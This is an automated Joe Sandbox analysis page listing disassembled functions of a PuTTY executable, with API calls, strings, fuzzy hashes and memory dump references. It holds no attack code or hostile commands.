Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
String ID:
API String ID: 3596705544-0
Opcode ID: 34018294a498051e980ac15b16bae011df254aeae2751745eacb366f74d19564
Instruction ID: 16d9a61d4c8f4c0b26941391f06b3cf7de6fa5b9bc7b9e41cf71e553ed328da4
Opcode Fuzzy Hash: 34018294a498051e980ac15b16bae011df254aeae2751745eacb366f74d19564
Instruction Fuzzy Hash: 4131BE2172865186FA256B2AE8147AE7655FB89FC0F904035DF8D97BB9DE3CD10A8F00

Function 00007FF6BB2AB0F0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183comCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF6BB2AB1A4
CoCreateInstance.OLE32 ref: 00007FF6BB2AB1FC

Part of subcall function 00007FF6BB34E168: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34E19C

Strings

appname, xrefs: 00007FF6BB2AB289, 00007FF6BB2AB339
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c, xrefs: 00007FF6BB2AB290, 00007FF6BB2AB340
Pageant.exe, xrefs: 00007FF6BB2AB0F2
Connect to PuTTY session ', xrefs: 00007FF6BB2AB269
%.*s%s, xrefs: 00007FF6BB2AB157
Run %.*s, xrefs: 00007FF6BB2AB2B1, 00007FF6BB2AB361

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CreateFileInstanceModuleName_invalid_parameter_noinfo
String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
API String ID: 3863850918-4263420936
Opcode ID: 31d2002dde3f6c8e20ea9a745d984a8f7ad6f382189b8d399cf2a4f20554d6d3
Instruction ID: 358d064f21c50be097718e0b910202ecb8d864c0f3660b50f6a5e0443aa04946
Opcode Fuzzy Hash: 31d2002dde3f6c8e20ea9a745d984a8f7ad6f382189b8d399cf2a4f20554d6d3
Instruction Fuzzy Hash: 8D815C25B18A4681EE00AB1EE5542BE6790BF8DB80F844432DF4E977B5EF7DE506CB00

Function 00007FF6BB34B928 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF6BB34B957
GetFileType.KERNEL32 ref: 00007FF6BB34B96D
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BB34B995
WriteConsoleW.KERNEL32 ref: 00007FF6BB34B9CB

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 00007FF6BB34B97C
extralen <= maxsize - oldlen, xrefs: 00007FF6BB34B92E, 00007FF6BB34BAB2
Microsoft Visual C++ Runtime Library, xrefs: 00007FF6BB34BB0F
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/memory.c, xrefs: 00007FF6BB34B92F, 00007FF6BB34BAB3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/memory.c$Assertion failed: %Ts, file %Ts, line %d$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
API String ID: 2943507729-192126552
Opcode ID: 288ffc7eb7cb696915e75e51f6c17b2528ae90d6908bd63b861c5cf8abea1641
Instruction ID: 4bd01b5391dcd8e3220c18cff7b5fb206056dd4cd8f99e702d4525970d610928
Opcode Fuzzy Hash: 288ffc7eb7cb696915e75e51f6c17b2528ae90d6908bd63b861c5cf8abea1641
Instruction Fuzzy Hash: 1951D761A1868641FA50EB69E4513BE7364FF88794F500235EB9D83BFAEF3DD5048B00

Function 00007FF6BB2BD560 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 128registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF6BB2BDAC6), ref: 00007FF6BB2C678D
Part of subcall function 00007FF6BB2C6750: RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C67D4

RegCloseKey.ADVAPI32(?), ref: 00007FF6BB2BD74F

Part of subcall function 00007FF6BB2C6890: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,?,?,00007FF6BB2BDE03), ref: 00007FF6BB2C68CB
Part of subcall function 00007FF6BB2C6890: RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C6910

Strings

PublicKey, xrefs: 00007FF6BB2BD5E6
PermitRSASHA256, xrefs: 00007FF6BB2BD708
PermitRSASHA512, xrefs: 00007FF6BB2BD72A
Validity, xrefs: 00007FF6BB2BD61D
MatchHosts, xrefs: 00007FF6BB2BD661
PermitRSASHA1, xrefs: 00007FF6BB2BD6E6
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00007FF6BB2BD5A5

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: QueryValue$Close$Create
String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
API String ID: 3505349609-2091482613
Opcode ID: 9027386435330d1efe4c3c7eec013eb5f3c407927519d43a0ace7fbf9077bf57
Instruction ID: ca8f37ec3b4c17beb8fa6fe8b111234446d8ecc6e8b9db18d231447f8c05dfcb
Opcode Fuzzy Hash: 9027386435330d1efe4c3c7eec013eb5f3c407927519d43a0ace7fbf9077bf57
Instruction Fuzzy Hash: DC512721A0DA4281EE10EB59A6553FAA7A0BF8DBC0F444535EF8D877A6EF7CE005C740

Function 00007FF6BB352CE8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,?,00007FF6BB3528A0,?,?,00000000,00007FF6BB3567C0,?,?,00000003,00007FF6BB34837D), ref: 00007FF6BB352E67
GetProcAddress.KERNEL32(?,00000000,?,00007FF6BB3528A0,?,?,00000000,00007FF6BB3567C0,?,?,00000003,00007FF6BB34837D), ref: 00007FF6BB352E73

Strings

api-ms-, xrefs: 00007FF6BB352DB1
MZx, xrefs: 00007FF6BB352D07, 00007FF6BB352DF0, 00007FF6BB352E50
ext-ms-, xrefs: 00007FF6BB352DC4

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: MZx$api-ms-$ext-ms-
API String ID: 3013587201-2431898299
Opcode ID: 588d0943e1309766ace5999e7f173c8c72f43942c2027463cc149be416f78287
Instruction ID: 2aa0646dc4c89b0c3017408e440e41fadbd79f73390f0c107a7a7b9af9103cb9
Opcode Fuzzy Hash: 588d0943e1309766ace5999e7f173c8c72f43942c2027463cc149be416f78287
Instruction Fuzzy Hash: F841C262B19A0281EE16CB1EEC946796391BF4CBE0F184535DF2DCB7A4EE3CE4498744

Function 00007FF6BB2A9380 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 80COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32 ref: 00007FF6BB2A9483

Strings

bold, , xrefs: 00007FF6BB2A941F
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A93EC
Font: %s, %sdefault height, xrefs: 00007FF6BB2A9467
pixel, xrefs: 00007FF6BB2A9432
point, xrefs: 00007FF6BB2A9439
c && c->ctrl->type == CTRL_FONTSELECT, xrefs: 00007FF6BB2A93E5
Font: %s, %s%d-%s, xrefs: 00007FF6BB2A9456

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
API String ID: 3367045223-1831221297
Opcode ID: 5a45def895cb1a708c8c6c847339d64b2b383093603e3f7d01d740163e329f99
Instruction ID: 58e1d385cc21175e950c7fbc10efd587d4cd534b7cfa9d228a86a84dee7dca7c
Opcode Fuzzy Hash: 5a45def895cb1a708c8c6c847339d64b2b383093603e3f7d01d740163e329f99
Instruction Fuzzy Hash: 34319321B0864684EA11EB1EEA856B823A5BF8CBC4F814531DF0DD77B1EE3CE545C700

Function 00007FF6BB365950 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB365E04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365E45
Part of subcall function 00007FF6BB365E04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365EC5
Part of subcall function 00007FF6BB365E04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365F19
Part of subcall function 00007FF6BB365E04: _get_daylight.LIBCMT ref: 00007FF6BB365F71

CreateFileW.KERNEL32 ref: 00007FF6BB365A56
CreateFileW.KERNEL32 ref: 00007FF6BB365AA6
GetLastError.KERNEL32 ref: 00007FF6BB365AD6
GetFileType.KERNEL32 ref: 00007FF6BB365AEB
GetLastError.KERNEL32 ref: 00007FF6BB365AF5
CloseHandle.KERNEL32 ref: 00007FF6BB365B28
CloseHandle.KERNEL32 ref: 00007FF6BB365C8C
CreateFileW.KERNEL32 ref: 00007FF6BB365CC1
GetLastError.KERNEL32 ref: 00007FF6BB365CD0

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: dfaf525e84a8964243db45ad7a08f075fd56589bf58fcb89c567e3f2566f9169
Instruction ID: 075e60822671fedae1e960fa3ceb3b8e067158e872d4d5d091d0d09183ffe088
Opcode Fuzzy Hash: dfaf525e84a8964243db45ad7a08f075fd56589bf58fcb89c567e3f2566f9169
Instruction Fuzzy Hash: 41C18E33B28A4686EB10CF69C4906AC3761FB49BA8B125336DB1E977E4DF39E455C700

Function 00007FF6BB2A5520 Relevance: 13.7, APIs: 9, Instructions: 180windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BB2A5556
SetMapMode.GDI32 ref: 00007FF6BB2A55A5
MapDialogRect.USER32 ref: 00007FF6BB2A55CC
SendMessageA.USER32 ref: 00007FF6BB2A55E8
SelectObject.GDI32 ref: 00007FF6BB2A55F4
GetTextExtentExPointA.GDI32 ref: 00007FF6BB2A5639
SelectObject.GDI32 ref: 00007FF6BB2A57AA
ReleaseDC.USER32 ref: 00007FF6BB2A57B6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ObjectSelect$DialogExtentMessageModePointRectReleaseSendText
String ID:
API String ID: 2675881590-0
Opcode ID: 5dc2d4d466478fed1e359064a18b285267e44e4fd746b5c5e6b5b90864fb4ce9
Instruction ID: 20f01a83b5edad268746f6c708cf6851060730142e7b05949f0b5331fe4285b7
Opcode Fuzzy Hash: 5dc2d4d466478fed1e359064a18b285267e44e4fd746b5c5e6b5b90864fb4ce9
Instruction Fuzzy Hash: 5771832261868185EB509F1AE95077A77A4FB8DFC4F594431DF8D87BA5DE3DE0048F00

Function 00007FF6BB34D1E0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 489COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34D224
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34D5FC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34D8A7

Strings

f, xrefs: 00007FF6BB34D346
0, xrefs: 00007FF6BB34D64C
p, xrefs: 00007FF6BB34D2D6
p, xrefs: 00007FF6BB34D34E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$f$p$p
API String ID: 3215553584-1202675169
Opcode ID: 742ecf5f782f48d894291cd9e8debc9be088f5c6d3ec10e94422746121de430c
Instruction ID: 316b1b9029ef94c2d71082285c003e3afa8c10a4f693bdc3ea485b931f8b341c
Opcode Fuzzy Hash: 742ecf5f782f48d894291cd9e8debc9be088f5c6d3ec10e94422746121de430c
Instruction Fuzzy Hash: 07127E62E0C24386FB646E1DE05467D76A1FB88754FC44036E79A876E8DF3EED808B10

Function 00007FF6BB2A8A18 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BB2A8B2C
GetDeviceCaps.GDI32 ref: 00007FF6BB2A8B3D
MulDiv.KERNEL32 ref: 00007FF6BB2A8B4E
ReleaseDC.USER32 ref: 00007FF6BB2A8B62
ChooseFontA.COMDLG32 ref: 00007FF6BB2A8C15

Strings

h, xrefs: 00007FF6BB2A8BDB

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CapsChooseDeviceFontRelease
String ID: h
API String ID: 554219020-2439710439
Opcode ID: b484c44fd3baadefc3494cc91ab8e6aaf4eda1bb37a536306e2e396374a8010b
Instruction ID: 2f712186b763218a524f6376ad4f65b57dc5f593ea02dadf92b81c3bcc9a984d
Opcode Fuzzy Hash: b484c44fd3baadefc3494cc91ab8e6aaf4eda1bb37a536306e2e396374a8010b
Instruction Fuzzy Hash: 5F71A372A0C68189EB648B29E5543BE77A1FB49B84F544036CB8E87BA9DF7CD444CF40

Function 00007FF6BB2B03D0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2B0427
GetProcAddress.KERNEL32 ref: 00007FF6BB2B0447
GetProcAddress.KERNEL32 ref: 00007FF6BB2B0467

Strings

advapi32.dll, xrefs: 00007FF6BB2B0405
CryptReleaseContext, xrefs: 00007FF6BB2B0460
CryptAcquireContextA, xrefs: 00007FF6BB2B041D
CryptGenRandom, xrefs: 00007FF6BB2B0440

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 190572456-129414566
Opcode ID: 8af66a21f234880caf0c377b029a025b0e882004d2de61cf7b45a5a32227a345
Instruction ID: baa4458d7a362154b8603314c6bc4fcde67328f985e1d24f2e090f74f1a11e27
Opcode Fuzzy Hash: 8af66a21f234880caf0c377b029a025b0e882004d2de61cf7b45a5a32227a345
Instruction Fuzzy Hash: 0431F821A09F5285FE69CB1DF9A033A23A0BF8C790F644535DA4DC6674EF7CE4468B10

Function 00007FF6BB2820B1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
SendMessageA.USER32 ref: 00007FF6BB282961

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
String ID: (
API String ID: 3620415003-3887548279
Opcode ID: 6ff9b6e3ccfa41eac43967d0f85491b21a13e8ae6f4853886475dc0a40d7efd6
Instruction ID: 22d0dbc0b4bf5a78bcf978be52c7c05bb0fe2ef979c9e9ddd3de862f1d510460
Opcode Fuzzy Hash: 6ff9b6e3ccfa41eac43967d0f85491b21a13e8ae6f4853886475dc0a40d7efd6
Instruction Fuzzy Hash: 8A316026B0968949FE318B18E9543B92790BF88760F540534CB9D866F4DF7CE484DB10

Function 00007FF6BB28209E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
SendMessageA.USER32 ref: 00007FF6BB282961

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
String ID: (
API String ID: 3620415003-3887548279
Opcode ID: ae483f04362e8e07ddd5c55a28912365e7810ae5eae7119404d0a43c000be4cd
Instruction ID: 53dfdf0cd4b6cbd6c69792027212cc9d1fa50609cbda28d4b3dd02a9c65f9a0e
Opcode Fuzzy Hash: ae483f04362e8e07ddd5c55a28912365e7810ae5eae7119404d0a43c000be4cd
Instruction Fuzzy Hash: 6F316D36B0D68A89FE208B18E9543BD23A0FF88750F940434CB8D866B4DF7CE484DB10

Function 00007FF6BB2820C3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
